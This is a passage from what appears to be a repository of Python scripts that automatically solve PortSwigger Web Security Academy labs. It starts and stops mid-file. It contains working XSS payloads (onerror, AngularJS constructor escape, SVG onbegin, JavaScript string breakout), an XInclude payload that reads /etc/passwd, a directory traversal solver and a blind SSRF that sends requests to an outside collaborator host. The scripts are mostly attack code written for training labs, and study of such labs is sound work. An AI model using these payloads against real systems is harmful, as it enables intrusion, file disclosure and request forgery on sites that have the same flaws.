53 | 		r = s.get(url, allow_redirects=False)
54 | 		time.sleep(1)
55 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
56 | 			print('\n[-] HOST seems to be down <!>')
57 | 			sys.exit(-1)
58 | 		else:
59 | 			print('[+] Trying send Directory Traversal attack ...\n')
60 | 			time.sleep(1)
61 | 			r = read_file(s, url, file)
62 | 			s.cookies.clear()
63 | 			time.sleep(2)
64 | 			r = s.get(url)
65 | 			if 'Congratulations, you solved the lab!' in r.text:
66 | 				print('[+] The lab is solved !')
67 | 	except requests.exceptions.ProxyError:
68 | 		print('[-] PROXY seems to be missconfigured <!>')
69 | 	except KeyboardInterrupt:
70 | 		sys.exit(0)
71 | 
72 | if __name__ == "__main__":
73 | 	main()
74 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab12.py:
--------------------------------------------------------------------------------
 1 | # Reflected DOM XSS
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-dom-xss-reflected
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def send_payload(s, url, payload):
27 | 	injection_uri = url + payload
28 | 	r = s.get(injection_uri)
29 | 	time.sleep(1)
30 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
31 | 	print('[+] Using payload:\t%s' % payload)
32 | 	return r
33 | 
34 | def send_xss(s, url):
35 | 	search_path = url + '/?search='
36 | 	payload = 'gwyo\\"};alert(1);//'
37 | 	# r = send_payload(s, search_path, urllib.parse.quote(payload))
38 | 	r = send_payload(s, search_path, payload)
39 | 	return r
40 | 
41 | 
42 | ##########################################################
43 | #	MAIN
44 | ##########################################################
45 | 
46 | def main():
47 | 	print('[+] Lab: Reflected DOM XSS')
48 | 	parser = argparse.ArgumentParser(description="[+] Lab: Reflected DOM XSS")
49 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
50 | 	args = parser.parse_args()
51 | 	parsed_url = urllib.parse.urlparse(args.url)
52 | 	host = parsed_url.netloc
53 | 	print(parsed_url)
54 | 	url = parsed_url.scheme + '://' + host
55 | 	s = requests.Session()
56 | 	s.proxies = proxies		# Comment this line to disable proxying
57 | 	s.verify = False
58 | 	try:
59 | 		r = s.get(url, allow_redirects=False)
60 | 		time.sleep(1)
61 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
62 | 			print('\n[-] HOST seems to be down <!>')
63 | 			sys.exit(-1)
64 | 		else:
65 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
66 | 			r = send_xss(s, url)
67 | 			if r.status_code == 200 :
68 | 				s.cookies.clear()
69 | 				s.headers.clear()
70 | 				time.sleep(3)
71 | 				r = s.get(url)
72 | 				if  'Congratulations, you solved the lab!' in r.text:
73 | 					print('[+] The lab is solved')
74 | 				else:
75 | 					print('[+] The Exploit sent the given payload !')
76 | 	except requests.exceptions.ProxyError:
77 | 		print('[-] PROXY seems to be missconfigured <!>')
78 | 	except KeyboardInterrupt:
79 | 		sys.exit(0)
80 | 
81 | 
82 | if __name__ == "__main__":
83 | 	main()
84 | 


--------------------------------------------------------------------------------
/XXE/exploit-lab07.py:
--------------------------------------------------------------------------------
 1 | # Exploiting XInclude to retrieve files
 2 | 
 3 | # https://portswigger.net/web-security/xxe/lab-xinclude-attack
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_xxe(s, url):
26 | 	check_stock_path = url + '/product/stock'
27 | 	exploit_body = f"""<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>"""
28 | 	exploit_data = {"productId": '1' + exploit_body, "storeId": "3"}
29 | 	print('\n[+] Using payload:\n%s' % exploit_body)
30 | 	r = s.post(check_stock_path, data=exploit_data)
31 | 	time.sleep(2)
32 | 	res = r.text
33 | 	print('\n[+] Response:\n%s' % res)
34 | 	return r
35 | 
36 | 
37 | ##########################################################
38 | #	MAIN
39 | ##########################################################
40 | 
41 | def main():
42 | 	print('[+] Lab: Exploiting XInclude to retrieve files')
43 | 	parser = argparse.ArgumentParser(description="[+] Lab: Exploiting XInclude to retrieve files")
44 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
45 | 	args = parser.parse_args()
46 | 	parsed_url = urllib.parse.urlparse(args.url)
47 | 	host = parsed_url.netloc
48 | 	print(parsed_url)
49 | 	url = parsed_url.scheme + '://' + host
50 | 	s = requests.Session()
51 | 	s.proxies = proxies		# Comment this line to disable proxying
52 | 	s.verify = False
53 | 	try:
54 | 		r = s.get(url, allow_redirects=False)
55 | 		time.sleep(1)
56 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
57 | 			print('\n[-] HOST seems to be down <!>')
58 | 			sys.exit(-1)
59 | 		else:
60 | 			print("[+] Trying to send a XXE attack to retrieve the content of /etc/passwd...")
61 | 			r = send_xxe(s, url)
62 | 			s.cookies.clear()
63 | 			s.headers.clear()
64 | 			time.sleep(5)
65 | 			r = s.get(url, allow_redirects=False)
66 | 			time.sleep(1)
67 | 			if r.status_code == 200 and 'Congratulations, you solved the lab!' in r.text:
68 | 				print('[+] The lab is solved !')
69 | 			elif r.status_code == 200:
70 | 				print('[+] The Exploit sent the given payload !')
71 | 	except requests.exceptions.ProxyError:
72 | 		print('[-] PROXY seems to be missconfigured <!>')
73 | 	except KeyboardInterrupt:
74 | 		sys.exit(0)
75 | 
76 | if __name__ == "__main__":
77 | 	main()
78 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab11.py:
--------------------------------------------------------------------------------
 1 | # DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def send_payload(s, url, payload):
27 | 	injection_uri = url + payload
28 | 	r = s.get(injection_uri)
29 | 	time.sleep(1)
30 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
31 | 	print('[+] Using payload:\t%s' % payload)
32 | 	return r
33 | 
34 | def send_xss(s, url):
35 | 	search_path = url + '/?search='
36 | 	xss_payload = """{{$on.constructor('alert(1)')()}}"""
37 | 	r = send_payload(s, search_path, urllib.parse.quote(xss_payload))
38 | 	return r
39 | 
40 | 
41 | def main():
42 | 	print('[+] Lab: DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded')
43 | 	parser = argparse.ArgumentParser(description="[+] Lab: DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded")
44 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
45 | 	args = parser.parse_args()
46 | 	parsed_url = urllib.parse.urlparse(args.url)
47 | 	host = parsed_url.netloc
48 | 	print(parsed_url)
49 | 	url = parsed_url.scheme + '://' + host
50 | 	s = requests.Session()
51 | 	s.proxies = proxies		# Comment this line to disable proxying
52 | 	s.verify = False
53 | 	try:
54 | 		r = s.get(url, allow_redirects=False)
55 | 		time.sleep(1)
56 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
57 | 			print('\n[-] HOST seems to be down <!>')
58 | 			sys.exit(-1)
59 | 		else:
60 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
61 | 			r = send_xss(s, url)
62 | 			if r.status_code == 200 :
63 | 				s.cookies.clear()
64 | 				s.headers.clear()
65 | 				time.sleep(3)
66 | 				r = s.get(url)
67 | 				if  'Congratulations, you solved the lab!' in r.text:
68 | 					print('[+] The lab is solved')
69 | 				else:
70 | 					print('[+] The Exploit sent the given payload !')
71 | 	except requests.exceptions.ProxyError:
72 | 		print('[-] PROXY seems to be missconfigured <!>')
73 | 	except KeyboardInterrupt:
74 | 		sys.exit(0)
75 | 
76 | if __name__ == "__main__":
77 | 	main()
78 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab04.py:
--------------------------------------------------------------------------------
 1 | # DOM XSS in innerHTML sink using source location.search
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-innerhtml-sink
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def send_payload(s, url, payload):
27 | 	injection_uri = url + payload
28 | 	r = s.get(injection_uri)
29 | 	time.sleep(1)
30 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
31 | 	print('[+] Using payload:\t%s' % payload)
32 | 	return r
33 | 
34 | def send_xss(s, url):
35 | 	search_path = url + '/?search='
36 | 	xss_payload = '"> <img src=x onerror=alert(1) />'
37 | 	r = send_payload(s, search_path, xss_payload)
38 | 	return r
39 | 
40 | 
41 | ##########################################################
42 | #	MAIN
43 | ##########################################################
44 | 
45 | def main():
46 | 	print('[+] Lab: DOM XSS in innerHTML sink using source location.search')
47 | 	parser = argparse.ArgumentParser(description="[+] Lab: DOM XSS in innerHTML sink using source location.search")
48 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
49 | 	args = parser.parse_args()
50 | 	parsed_url = urllib.parse.urlparse(args.url)
51 | 	host = parsed_url.netloc
52 | 	print(parsed_url)
53 | 	url = parsed_url.scheme + '://' + host
54 | 	s = requests.Session()
55 | 	s.proxies = proxies		# Comment this line to disable proxying
56 | 	s.verify = False
57 | 	try:
58 | 		r = s.get(url, allow_redirects=False)
59 | 		time.sleep(1)
60 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
61 | 			print('\n[-] HOST seems to be down <!>')
62 | 			sys.exit(-1)
63 | 		else:
64 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
65 | 			r = send_xss(s, url)
66 | 			s.cookies.clear()
67 | 			s.headers.clear()
68 | 			time.sleep(3)
69 | 			r = s.get(url)
70 | 			if r.status_code == 200 and 'Congratulations, you solved the lab!' in r.text:
71 | 				print('[+] The lab is solved')
72 | 			elif r.status_code == 200:
73 | 				print('[+] The Exploit sent the given payload !')
74 | 	except requests.exceptions.ProxyError:
75 | 		print('[-] PROXY seems to be missconfigured <!>')
76 | 	except KeyboardInterrupt:
77 | 		sys.exit(0)
78 | 
79 | if __name__ == "__main__":
80 | 	main()
81 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab16.py:
--------------------------------------------------------------------------------
 1 | # Reflected XSS with some SVG markup allowed
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/contexts/lab-some-svg-markup-allowed
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def send_payload(s, url, payload):
27 | 	injection_uri = url + payload
28 | 	r = s.get(injection_uri, verify=False, proxies=proxies)
29 | 	time.sleep(1)
30 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
31 | 	print('[+] Using payload:\t%s' % payload)
32 | 	return r
33 | 
34 | def send_xss(s, url):
35 | 	search_path = url + '/?search='
36 | 	xss_payload = """<svg><animatetransform onbegin=alert(1) attributeName=transform>"""
37 | 	r = send_payload(s, search_path, urllib.parse.quote(xss_payload))
38 | 	return r
39 | 
40 | 
41 | ##########################################################
42 | #	MAIN
43 | ##########################################################
44 | 
45 | def main():
46 | 	print('[+] Lab: Reflected XSS with some SVG markup allowed')
47 | 	parser = argparse.ArgumentParser(description="[+] Lab: Reflected XSS with some SVG markup allowed")
48 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
49 | 	args = parser.parse_args()
50 | 	parsed_url = urllib.parse.urlparse(args.url)
51 | 	host = parsed_url.netloc
52 | 	print(parsed_url)
53 | 	url = parsed_url.scheme + '://' + host
54 | 	s = requests.Session()
55 | 	s.proxies = proxies		# Comment this line to disable proxying
56 | 	s.verify = False
57 | 	try:
58 | 		r = s.get(url, allow_redirects=False)
59 | 		time.sleep(1)
60 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
61 | 			print('\n[-] HOST seems to be down <!>')
62 | 			sys.exit(-1)
63 | 		else:
64 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
65 | 			r = send_xss(s, url)
66 | 			time.sleep(1)
67 | 			if r.status_code == 200 :
68 | 				r = s.get(url)
69 | 				if  'Congratulations, you solved the lab!' in r.text:
70 | 					print('[+] The lab is solved')
71 | 				else:
72 | 					print('[+] The Exploit sent the given payload !')
73 | 	except requests.exceptions.ProxyError:
74 | 		print('[-] PROXY seems to be missconfigured <!>')
75 | 	except KeyboardInterrupt:
76 | 		sys.exit(0)
77 | 
78 | if __name__ == "__main__":
79 | 	main()
80 | 


--------------------------------------------------------------------------------
/XXE/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## XXE
 3 | 
 4 | 
 5 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/XXE/exploit-lab01.py)
 6 | 
 7 | Lab: [Exploiting XXE using external entities to retrieve files](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files)
 8 | 
 9 | Difficulty: APPRENTICE
10 | 
11 | 
12 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/XXE/exploit-lab02.py)
13 | 
14 | Lab: [Exploiting XXE to perform SSRF attacks](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf)
15 | 
16 | Difficulty: APPRENTICE
17 | 
18 | 
19 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/XXE/exploit-lab03.py)
20 | 
21 | Lab: [Blind XXE with out-of-band interaction](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction)
22 | 
23 | Difficulty: PRACTITIONER
24 | 
25 | 
26 | ### [**Script 04**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/XXE/exploit-lab04.py)
27 | 
28 | Lab: [Blind XXE with out-of-band interaction via XML parameter entities](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities)
29 | 
30 | Difficulty: PRACTITIONER
31 | 
32 | 
33 | ### [**Script 05**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/XXE/exploit-lab05.py)
34 | 
35 | Lab: [Exploiting blind XXE to exfiltrate data using a malicious external DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration)
36 | 
37 | Difficulty: PRACTITIONER
38 | 
39 | 
40 | ### [**Script 06**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/XXE/exploit-lab06.py)
41 | 
42 | Lab: [Exploiting blind XXE to retrieve data via error messages](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages)
43 | 
44 | Difficulty: PRACTITIONER
45 | 
46 | 
47 | ### [**Script 07**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/XXE/exploit-lab07.py)
48 | 
49 | Lab: [Exploiting XInclude to retrieve files](https://portswigger.net/web-security/xxe/lab-xinclude-attack)
50 | 
51 | Difficulty: PRACTITIONER
52 | 
53 | 
54 | ### [**Script 08**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/XXE/exploit-lab08.py)
55 | 
56 | Lab: [Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload)
57 | 
58 | Difficulty: PRACTITIONER
59 | 
60 | - Require shutil & pytesseract (python3 -m pip install pytest-shutil pytesseract)
61 | 
62 | 
63 | ### [**Script 09**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/XXE/exploit-lab09.py)
64 | 
65 | Lab: [Exploiting XXE to retrieve data by repurposing a local DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd)
66 | 
67 | Difficulty: EXPERT
68 | 
69 | 
70 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab09.py:
--------------------------------------------------------------------------------
 1 | # Reflected XSS into a JavaScript string with angle brackets HTML encoded
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/contexts/lab-javascript-string-angle-brackets-html-encoded
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_payload(s, url, payload):
26 | 	injection_uri = url + payload
27 | 	r = s.get(injection_uri)
28 | 	time.sleep(1)
29 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
30 | 	print('[+] Using payload:\t%s' % payload)
31 | 	return r
32 | 
33 | def send_xss(s, url):
34 | 	search_path = url + '/?search='
35 | 	xss_payload = "'-alert(1)-'"
36 | 	r = send_payload(s, search_path, xss_payload)
37 | 	return r
38 | 
39 | 
40 | ##########################################################
41 | #	MAIN
42 | ##########################################################
43 | 
44 | def main():
45 | 	print('[+] Lab: Reflected XSS into a JavaScript string with angle brackets HTML encoded')
46 | 	parser = argparse.ArgumentParser(description="[+] Lab: Reflected XSS into a JavaScript string with angle brackets HTML encoded")
47 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
48 | 	args = parser.parse_args()
49 | 	parsed_url = urllib.parse.urlparse(args.url)
50 | 	host = parsed_url.netloc
51 | 	print(parsed_url)
52 | 	url = parsed_url.scheme + '://' + host
53 | 	s = requests.Session()
54 | 	s.proxies = proxies		# Comment this line to disable proxying
55 | 	s.verify = False
56 | 	try:
57 | 		r = s.get(url, allow_redirects=False)
58 | 		time.sleep(1)
59 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
60 | 			print('\n[-] HOST seems to be down <!>')
61 | 			sys.exit(-1)
62 | 		else:
63 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
64 | 			r = send_xss(s, url)
65 | 			if r.status_code == 200 :
66 | 				s.cookies.clear()
67 | 				s.headers.clear()
68 | 				time.sleep(3)
69 | 				r = s.get(url)
70 | 				if  'Congratulations, you solved the lab!' in r.text:
71 | 					print('[+] The lab is solved')
72 | 				else:
73 | 					print('[+] The Exploit sent the given payload !')
74 | 	except requests.exceptions.ProxyError:
75 | 		print('[-] PROXY seems to be missconfigured <!>')
76 | 	except KeyboardInterrupt:
77 | 		sys.exit(0)
78 | 
79 | if __name__ == "__main__":
80 | 	main()
81 | 


--------------------------------------------------------------------------------
/SSRF/exploit-lab03.py:
--------------------------------------------------------------------------------
 1 | # Blind SSRF with out-of-band detection
 2 | 
 3 | # https://portswigger.net/web-security/ssrf/blind/lab-out-of-band-detection
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | product_path = '/product?productId=1'
21 | 
22 | 
23 | ##########################################################
24 | #	FUNCTIONS
25 | ##########################################################
26 | 
27 | def send_ssrf(s, url, collab):
28 | 	product_url = url + product_path
29 | 	headers = {"Referer": "http://" + collab}
30 | 	r = s.get(product_url, headers=headers)
31 | 	if r.status_code == 200:
32 | 		print("[+] Successfully sent the request...")
33 | 		print("[+] You should Poll Now your collaborator...")
34 | 		return r
35 | 	else:
36 | 		print("[-] Exploit has FAILED to send the request <!>")
37 | 
38 | 
39 | ##########################################################
40 | #	MAIN
41 | ##########################################################
42 | 
43 | def main():
44 | 	print('[+] Lab: Blind SSRF with out-of-band detection')
45 | 	parser = argparse.ArgumentParser(description="[+] Lab: Blind SSRF with out-of-band detection")
46 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
47 | 	# parser.add_argument('-C',dest='collab',required=True, help="Collaborator URL")
48 | 	args = parser.parse_args()
49 | 	parsed_url = urllib.parse.urlparse(args.url)
50 | 	host = parsed_url.netloc
51 | 	print(parsed_url)
52 | 	url = parsed_url.scheme + '://' + host
53 | 	s = requests.Session()
54 | 	s.proxies = proxies		# Comment this line to disable proxying
55 | 	s.verify = False
56 | 	try:
57 | 		r = s.get(url, allow_redirects=False)
58 | 		time.sleep(1)
59 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
60 | 			print('\n[-] HOST seems to be down <!>')
61 | 			sys.exit(-1)
62 | 		else:
63 | 			print("\n[+] Sending Blind SSRF via the Referer header...")
64 | 			collab = "xxxxxxxxxxxxxxxxxxxx.oastify.com"
65 | 			# collab = args.collab
66 | 			send_ssrf(s, url, collab)
67 | 			time.sleep(2)
68 | 			r = s.get(url, allow_redirects=False)
69 | 			time.sleep(1)
70 | 			if r.status_code == 200 and 'Congratulations, you solved the lab!' in r.text:
71 | 				print('[+] The lab is solved !')
72 | 			elif r.status_code == 200:
73 | 				print("[+] The request didn't solve the lab <!>")
74 | 	except requests.exceptions.ProxyError:
75 | 		print('[-] PROXY seems to be missconfigured <!>')
76 | 	except KeyboardInterrupt:
77 | 		sys.exit(0)
78 | 
79 | if __name__ == "__main__":
80 | 	main()
81 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab03.py:
--------------------------------------------------------------------------------
 1 | # DOM XSS in document.write sink using source location.search
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def send_payload(s, url, payload):
27 | 	injection_uri = url + payload
28 | 	r = s.get(injection_uri, verify=False, proxies=proxies)
29 | 	time.sleep(1)
30 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
31 | 	print('[+] Using payload:\t%s' % payload)
32 | 	return r
33 | 
34 | def send_xss(s, url):
35 | 	search_path = url + '/?search='
36 | 	xss_payload = '"><img src=x onerror=alert(1) />'
37 | 	r = send_payload(s, search_path, xss_payload)
38 | 	return r
39 | 
40 | 
41 | ##########################################################
42 | #	MAIN
43 | ##########################################################
44 | 
45 | def main():
46 | 	print('[+] Lab: DOM XSS in document.write sink using source location.search')
47 | 	parser = argparse.ArgumentParser(description="[+] Lab: DOM XSS in document.write sink using source location.search")
48 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
49 | 	args = parser.parse_args()
50 | 	parsed_url = urllib.parse.urlparse(args.url)
51 | 	host = parsed_url.netloc
52 | 	print(parsed_url)
53 | 	url = parsed_url.scheme + '://' + host
54 | 	s = requests.Session()
55 | 	s.proxies = proxies		# Comment this line to disable proxying
56 | 	s.verify = False
57 | 	try:
58 | 		r = s.get(url, allow_redirects=False)
59 | 		time.sleep(1)
60 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
61 | 			print('\n[-] HOST seems to be down <!>')
62 | 			sys.exit(-1)
63 | 		else:
64 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
65 | 			r = send_xss(s, url)
66 | 			s.cookies.clear()
67 | 			s.headers.clear()
68 | 			time.sleep(3)
69 | 			r = s.get(url)
70 | 			if r.status_code == 200 and 'Congratulations, you solved the lab!' in r.text:
71 | 				print('[+] The lab is solved')
72 | 			elif r.status_code == 200:
73 | 				print('[+] The Exploit sent the given payload !')
74 | 	except requests.exceptions.ProxyError:
75 | 		print('[-] PROXY seems to be missconfigured <!>')
76 | 	except KeyboardInterrupt:
77 | 		sys.exit(0)
78 | 
79 | if __name__ == "__main__":
80 | 	main()
81 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab07.py:
--------------------------------------------------------------------------------
 1 | # Reflected XSS into attribute with angle brackets HTML-encoded
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/contexts/lab-attribute-angle-brackets-html-encoded
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def send_payload(s, url, payload):
27 | 	injection_uri = url + payload
28 | 	r = s.get(injection_uri)
29 | 	time.sleep(1)
30 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
31 | 	return r
32 | 
33 | def send_xss(s, url):
34 | 	search_path = url + '/?search='
35 | 	payload = """'a" autofocus onfocus=alert(1) data="'"""
36 | 	r = send_payload(s, search_path, urllib.parse.quote(payload))
37 | 	return r
38 | 
39 | 
40 | ##########################################################
41 | #	MAIN
42 | ##########################################################
43 | 
44 | def main():
45 | 	print('[+] Lab: Reflected XSS into attribute with angle brackets HTML-encoded')
46 | 	parser = argparse.ArgumentParser(description="[+] Lab: Reflected XSS into attribute with angle brackets HTML-encoded")
47 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
48 | 	args = parser.parse_args()
49 | 	parsed_url = urllib.parse.urlparse(args.url)
50 | 	host = parsed_url.netloc
51 | 	print(parsed_url)
52 | 	url = parsed_url.scheme + '://' + host
53 | 	s = requests.Session()
54 | 	s.proxies = proxies		# Comment this line to disable proxying
55 | 	s.verify = False
56 | 	try:
57 | 		r = s.get(url, allow_redirects=False)
58 | 		time.sleep(1)
59 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
60 | 			print('\n[-] HOST seems to be down <!>')
61 | 			sys.exit(-1)
62 | 		else:
63 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
64 | 			r = send_xss(s, url)
65 | 			s.cookies.clear()
66 | 			s.headers.clear()
67 | 			time.sleep(3)
68 | 			r = s.get(url)
69 | 			if r.status_code == 200 and 'Congratulations, you solved the lab!' in r.text:
70 | 				print('[+] The lab is solved')
71 | 			elif r.status_code == 200:
72 | 				print('[+] The lab should be solved')
73 | 				print('[+] The Exploit sent the given payload !')
74 | 	except requests.exceptions.ProxyError:
75 | 		print('[-] PROXY seems to be missconfigured <!>')
76 | 	except KeyboardInterrupt:
77 | 		sys.exit(0)
78 | 
79 | if __name__ == "__main__":
80 | 	main()
81 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab30.py:
--------------------------------------------------------------------------------
 1 | # Reflected XSS protected by CSP, with CSP bypass
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/content-security-policy/lab-csp-bypass
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | import argparse
14 | 
15 | 
16 | warnings.filterwarnings("ignore", category=DeprecationWarning)
17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
18 | 
